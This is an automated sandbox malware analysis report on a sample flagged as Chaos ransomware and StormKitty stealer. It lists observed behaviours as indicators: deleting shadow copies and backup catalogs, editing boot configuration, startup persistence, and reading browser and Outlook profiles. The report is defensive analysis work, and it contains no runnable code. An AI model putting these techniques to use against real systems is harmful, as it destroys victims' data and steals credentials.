Malware Analysis Report

2025-04-13 21:20

Sample ID 250322-c552jswwes
Target ZGZ3X_nig.exe
SHA256 568d485f89554f0a315d1f839e5e2b33c7735f9b3dc3892391bdaa16a3f480e8
Tags
chaos stormkitty collection defense_evasion discovery evasion execution impact persistence privilege_escalation ransomware spyware stealer upx
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

568d485f89554f0a315d1f839e5e2b33c7735f9b3dc3892391bdaa16a3f480e8

Threat Level: Known bad

The file ZGZ3X_nig.exe was found to be: Known bad.

Malicious Activity Summary

chaos stormkitty collection defense_evasion discovery evasion execution impact persistence privilege_escalation ransomware spyware stealer upx

Chaos

Chaos family

Chaos Ransomware

Stormkitty family

StormKitty payload

StormKitty

Deletes shadow copies

Modifies boot configuration data using bcdedit

Deletes backup catalog

Disables Task Manager via registry modification

Blocklisted process makes network request

Downloads MZ/PE file

Checks computer location settings

Drops startup file

Reads user/profile data of web browsers

Executes dropped EXE

Looks up external IP address via web service

Accesses Microsoft Outlook profiles

Drops desktop.ini file(s)

Command and Scripting Interpreter: PowerShell

UPX packed file

Sets desktop wallpaper using registry

Hide Artifacts: Ignore Process Interrupts

Browser Information Discovery

System Location Discovery: System Language Discovery

System Network Configuration Discovery: Wi-Fi Discovery

Event Triggered Execution: Netsh Helper DLL

Unsigned PE

Program crash

Enumerates physical storage devices

Uses Volume Shadow Copy service COM API

Suspicious use of WriteProcessMemory

Opens file in notepad (likely ransom note)

Uses Task Scheduler COM API

Suspicious use of AdjustPrivilegeToken

outlook_win_path

outlook_office_path

Interacts with shadow copies

Suspicious behavior: AddClipboardFormatListener

Checks SCSI registry key(s)

Modifies registry class

Suspicious behavior: EnumeratesProcesses

Runs net.exe

Checks processor information in registry

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2025-03-22 02:40

Signatures

UPX packed file

upx
Description Indicator Process Target
N/A N/A N/A N/A

Unsigned PE

Description Indicator Process Target
N/A N/A N/A N/A

Analysis: behavioral2

Detonation Overview

Submitted

2025-03-22 02:40

Reported

2025-03-22 02:43

Platform

win10v2004-20250314-en

Max time kernel

104s

Max time network

138s

Command Line

"C:\Users\Admin\AppData\Local\Temp\ZGZ3X_nig.exe"

Signatures

Chaos

ransomware chaos

Chaos Ransomware

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A

Chaos family

chaos

StormKitty

stealer stormkitty

StormKitty payload

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A

Stormkitty family

stormkitty

Deletes shadow copies

ransomware defense_evasion impact execution

Modifies boot configuration data using bcdedit

ransomware evasion
Description Indicator Process Target
N/A N/A C:\Windows\system32\bcdedit.exe N/A
N/A N/A C:\Windows\system32\bcdedit.exe N/A

Deletes backup catalog

ransomware
Description Indicator Process Target
N/A N/A C:\Windows\system32\wbadmin.exe N/A

Disables Task Manager via registry modification

defense_evasion

Downloads MZ/PE file

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-805952410-2104024357-1716932545-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\build.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-805952410-2104024357-1716932545-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Roaming\svchost.exe N/A

Drops startup file

Description Indicator Process Target
File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\svchost.url C:\Users\Admin\AppData\Roaming\svchost.exe N/A
File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\desktop.ini C:\Users\Admin\AppData\Roaming\svchost.exe N/A
File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\readme.txt C:\Users\Admin\AppData\Roaming\svchost.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\build.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\kernelv.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\svchost.exe N/A

Reads user/profile data of web browsers

spyware stealer

Accesses Microsoft Outlook profiles

collection
Description Indicator Process Target
Key opened \REGISTRY\USER\S-1-5-21-805952410-2104024357-1716932545-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 C:\Users\Admin\AppData\Local\Temp\kernelv.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-805952410-2104024357-1716932545-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 C:\Users\Admin\AppData\Local\Temp\kernelv.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-805952410-2104024357-1716932545-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 C:\Users\Admin\AppData\Local\Temp\kernelv.exe N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Drops desktop.ini file(s)

Description Indicator Process Target
File opened for modification C:\Users\Admin\Favorites\desktop.ini C:\Users\Admin\AppData\Roaming\svchost.exe N/A
File opened for modification C:\Users\Admin\Links\desktop.ini C:\Users\Admin\AppData\Roaming\svchost.exe N/A
File opened for modification C:\Users\Admin\OneDrive\desktop.ini C:\Users\Admin\AppData\Roaming\svchost.exe N/A
File opened for modification C:\Users\Admin\Saved Games\desktop.ini C:\Users\Admin\AppData\Roaming\svchost.exe N/A
File opened for modification C:\Users\Admin\AppData\Local\Microsoft\Windows\Burn\Burn\desktop.ini C:\Users\Admin\AppData\Roaming\svchost.exe N/A
File opened for modification C:\Users\Admin\AppData\Local\Microsoft\Windows\History\desktop.ini C:\Users\Admin\AppData\Roaming\svchost.exe N/A
File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\AccountPictures\desktop.ini C:\Users\Admin\AppData\Roaming\svchost.exe N/A
File opened for modification C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Maintenance\Desktop.ini C:\Users\Admin\AppData\Roaming\svchost.exe N/A
File opened for modification C:\Users\Admin\AppData\Local\Microsoft\Windows\Application Shortcuts\desktop.ini C:\Users\Admin\AppData\Roaming\svchost.exe N/A
File opened for modification C:\Users\All Users\Microsoft\Windows\Start Menu\desktop.ini C:\Users\Admin\AppData\Roaming\svchost.exe N/A
File opened for modification C:\Users\All Users\Microsoft\Windows\Start Menu\Programs\desktop.ini C:\Users\Admin\AppData\Roaming\svchost.exe N/A
File opened for modification C:\Users\All Users\Microsoft\Windows\Start Menu\Programs\Accessories\System Tools\desktop.ini C:\Users\Admin\AppData\Roaming\svchost.exe N/A
File opened for modification C:\Users\All Users\Microsoft\Windows\Start Menu\Programs\System Tools\desktop.ini C:\Users\Admin\AppData\Roaming\svchost.exe N/A
File opened for modification C:\Users\Default\AppData\Local\Microsoft\Windows\WinX\Group1\desktop.ini C:\Users\Admin\AppData\Roaming\svchost.exe N/A
File opened for modification C:\Users\Default\AppData\Local\Microsoft\Windows\WinX\Group2\desktop.ini C:\Users\Admin\AppData\Roaming\svchost.exe N/A
File opened for modification C:\Users\Public\Desktop\desktop.ini C:\Users\Admin\AppData\Roaming\svchost.exe N/A
File opened for modification C:\Users\Public\Music\desktop.ini C:\Users\Admin\AppData\Roaming\svchost.exe N/A
File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Administrative Tools\desktop.ini C:\Users\Admin\AppData\Roaming\svchost.exe N/A
File opened for modification C:\Users\Admin\Pictures\desktop.ini C:\Users\Admin\AppData\Roaming\svchost.exe N/A
File opened for modification C:\Users\All Users\Microsoft\Windows\Start Menu\Programs\Administrative Tools\desktop.ini C:\Users\Admin\AppData\Roaming\svchost.exe N/A
File opened for modification C:\Users\Public\desktop.ini C:\Users\Admin\AppData\Roaming\svchost.exe N/A
File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Libraries\desktop.ini C:\Users\Admin\AppData\Roaming\svchost.exe N/A
File opened for modification C:\Users\Admin\Searches\desktop.ini C:\Users\Admin\AppData\Roaming\svchost.exe N/A
File opened for modification C:\Users\All Users\Microsoft\Windows\Start Menu\Programs\Accessories\desktop.ini C:\Users\Admin\AppData\Roaming\svchost.exe N/A
File opened for modification C:\Users\All Users\Microsoft\Windows\Start Menu\Programs\Windows PowerShell\desktop.ini C:\Users\Admin\AppData\Roaming\svchost.exe N/A
File opened for modification C:\Users\Public\Pictures\desktop.ini C:\Users\Admin\AppData\Roaming\svchost.exe N/A
File opened for modification C:\Users\Admin\AppData\Local\Microsoft\Windows\Burn\Burn2\desktop.ini C:\Users\Admin\AppData\Roaming\svchost.exe N/A
File opened for modification C:\Users\Admin\Desktop\desktop.ini C:\Users\Admin\AppData\Roaming\svchost.exe N/A
File opened for modification C:\Users\Admin\Pictures\Saved Pictures\desktop.ini C:\Users\Admin\AppData\Roaming\svchost.exe N/A
File opened for modification C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\desktop.ini C:\Users\Admin\AppData\Roaming\svchost.exe N/A
File opened for modification C:\Users\Admin\Downloads\desktop.ini C:\Users\Admin\AppData\Roaming\svchost.exe N/A
File opened for modification C:\Users\All Users\Microsoft\Windows\Start Menu\Programs\Accessibility\desktop.ini C:\Users\Admin\AppData\Roaming\svchost.exe N/A
File opened for modification C:\Users\All Users\Microsoft\Windows\Start Menu\Programs\StartUp\desktop.ini C:\Users\Admin\AppData\Roaming\svchost.exe N/A
File opened for modification C:\Users\Default\AppData\Roaming\Microsoft\Windows\SendTo\desktop.ini C:\Users\Admin\AppData\Roaming\svchost.exe N/A
File opened for modification C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\Desktop.ini C:\Users\Admin\AppData\Roaming\svchost.exe N/A
File opened for modification C:\Users\Public\Documents\desktop.ini C:\Users\Admin\AppData\Roaming\svchost.exe N/A
File opened for modification C:\Users\Public\Videos\desktop.ini C:\Users\Admin\AppData\Roaming\svchost.exe N/A
File opened for modification C:\Users\Admin\Favorites\Links\desktop.ini C:\Users\Admin\AppData\Roaming\svchost.exe N/A
File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini C:\Users\Admin\AppData\Roaming\svchost.exe N/A
File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessibility\desktop.ini C:\Users\Admin\AppData\Roaming\svchost.exe N/A
File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Maintenance\Desktop.ini C:\Users\Admin\AppData\Roaming\svchost.exe N/A
File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\Desktop.ini C:\Users\Admin\AppData\Roaming\svchost.exe N/A
File opened for modification C:\Users\Public\AccountPictures\desktop.ini C:\Users\Admin\AppData\Roaming\svchost.exe N/A
File opened for modification C:\Users\Admin\AppData\Local\Microsoft\Windows\WinX\Group1\desktop.ini C:\Users\Admin\AppData\Roaming\svchost.exe N/A
File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\desktop.ini C:\Users\Admin\AppData\Roaming\svchost.exe N/A
File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\desktop.ini C:\Users\Admin\AppData\Roaming\svchost.exe N/A
File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories\desktop.ini C:\Users\Admin\AppData\Roaming\svchost.exe N/A
File opened for modification C:\Users\Admin\Pictures\Camera Roll\desktop.ini C:\Users\Admin\AppData\Roaming\svchost.exe N/A
File opened for modification C:\Users\Default\AppData\Local\Microsoft\Windows\WinX\Group3\desktop.ini C:\Users\Admin\AppData\Roaming\svchost.exe N/A
File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\SendTo\desktop.ini C:\Users\Admin\AppData\Roaming\svchost.exe N/A
File opened for modification C:\Users\Default\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\desktop.ini C:\Users\Admin\AppData\Roaming\svchost.exe N/A
File opened for modification C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessibility\desktop.ini C:\Users\Admin\AppData\Roaming\svchost.exe N/A
File opened for modification C:\Users\Admin\AppData\Local\Microsoft\Windows\Burn\Burn1\desktop.ini C:\Users\Admin\AppData\Roaming\svchost.exe N/A
File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\desktop.ini C:\Users\Admin\AppData\Roaming\svchost.exe N/A
File opened for modification C:\Users\Admin\Contacts\desktop.ini C:\Users\Admin\AppData\Roaming\svchost.exe N/A
File opened for modification C:\Users\Admin\Music\desktop.ini C:\Users\Admin\AppData\Roaming\svchost.exe N/A
File opened for modification C:\Users\Public\Downloads\desktop.ini C:\Users\Admin\AppData\Roaming\svchost.exe N/A
File opened for modification C:\Users\Public\Libraries\desktop.ini C:\Users\Admin\AppData\Roaming\svchost.exe N/A
File opened for modification F:\$RECYCLE.BIN\S-1-5-21-805952410-2104024357-1716932545-1000\desktop.ini C:\Users\Admin\AppData\Roaming\svchost.exe N/A
File opened for modification C:\Users\Admin\Documents\desktop.ini C:\Users\Admin\AppData\Roaming\svchost.exe N/A
File opened for modification C:\Users\Admin\AppData\Local\Microsoft\Windows\WinX\Group2\desktop.ini C:\Users\Admin\AppData\Roaming\svchost.exe N/A
File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\desktop.ini C:\Users\Admin\AppData\Roaming\svchost.exe N/A
File opened for modification C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories\desktop.ini C:\Users\Admin\AppData\Roaming\svchost.exe N/A
File opened for modification C:\Users\Admin\3D Objects\desktop.ini C:\Users\Admin\AppData\Roaming\svchost.exe N/A

Looks up external IP address via web service

Description Indicator Process Target
N/A ipinfo.io N/A N/A
N/A ipinfo.io N/A N/A

Sets desktop wallpaper using registry

ransomware
Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-21-805952410-2104024357-1716932545-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\AppData\\Local\\Temp\\kt8kky139.jpg" C:\Users\Admin\AppData\Roaming\svchost.exe N/A

UPX packed file

upx
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A

Hide Artifacts: Ignore Process Interrupts

defense_evasion
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Browser Information Discovery

discovery

Enumerates physical storage devices

Event Triggered Execution: Netsh Helper DLL

persistence privilege_escalation
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh C:\Windows\SysWOW64\netsh.exe N/A
Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh C:\Windows\SysWOW64\netsh.exe N/A
Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh C:\Windows\SysWOW64\netsh.exe N/A
Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh C:\Windows\SysWOW64\netsh.exe N/A
Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh C:\Windows\SysWOW64\netsh.exe N/A
Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh C:\Windows\SysWOW64\netsh.exe N/A

Program crash

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Users\Admin\AppData\Local\Temp\kernelv.exe

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\kernelv.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\chcp.com N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\findstr.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\netsh.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\netsh.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\chcp.com N/A

System Network Configuration Discovery: Wi-Fi Discovery

discovery
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\netsh.exe N/A

Checks SCSI registry key(s)

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\DISK&VEN_WDC&PROD_WDS100T2B0A\4&215468A5&0&000000 C:\Windows\System32\vds.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\FriendlyName C:\Windows\System32\vds.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CDROM&VEN_QEMU&PROD_QEMU_DVD-ROM\4&215468A5&0&010000 C:\Windows\System32\vds.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\FriendlyName C:\Windows\System32\vds.exe N/A

Checks processor information in registry

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\HARDWARE\Description\System\CentralProcessor\0 C:\Users\Admin\AppData\Local\Temp\kernelv.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier C:\Users\Admin\AppData\Local\Temp\kernelv.exe N/A

Interacts with shadow copies

ransomware
Description Indicator Process Target
N/A N/A C:\Windows\system32\vssadmin.exe N/A

Modifies registry class

Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-21-805952410-2104024357-1716932545-1000_Classes\Local Settings C:\Users\Admin\AppData\Roaming\svchost.exe N/A

Opens file in notepad (likely ransom note)

ransomware
Description Indicator Process Target
N/A N/A C:\Windows\system32\NOTEPAD.EXE N/A

Runs net.exe

Suspicious behavior: AddClipboardFormatListener

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Roaming\svchost.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\build.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\kernelv.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\kernelv.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\build.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\build.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\build.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\build.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\build.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\build.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\build.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\build.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\build.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\build.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\build.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\build.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\build.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\build.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\build.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\build.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\build.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\build.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\build.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\build.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\build.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\build.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\build.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\build.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\build.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\build.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\build.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\build.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\build.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\svchost.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\svchost.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\svchost.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\svchost.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\svchost.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\svchost.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\svchost.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\svchost.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\svchost.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\svchost.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\svchost.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\svchost.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\svchost.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\svchost.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\svchost.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\svchost.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\svchost.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\svchost.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\svchost.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\svchost.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\svchost.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\svchost.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\svchost.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\svchost.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\build.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\kernelv.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Roaming\svchost.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\system32\vssvc.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\vssvc.exe N/A
Token: SeAuditPrivilege N/A C:\Windows\system32\vssvc.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 33 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 34 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 35 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 36 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 33 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 34 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 35 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 36 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\system32\wbengine.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\wbengine.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\system32\wbengine.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 3920 wrote to memory of 1880 N/A C:\Users\Admin\AppData\Local\Temp\ZGZ3X_nig.exe C:\Windows\system32\cmd.exe
PID 3920 wrote to memory of 1880 N/A C:\Users\Admin\AppData\Local\Temp\ZGZ3X_nig.exe C:\Windows\system32\cmd.exe
PID 1880 wrote to memory of 3484 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\net.exe
PID 1880 wrote to memory of 3484 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\net.exe
PID 3484 wrote to memory of 4652 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 3484 wrote to memory of 4652 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
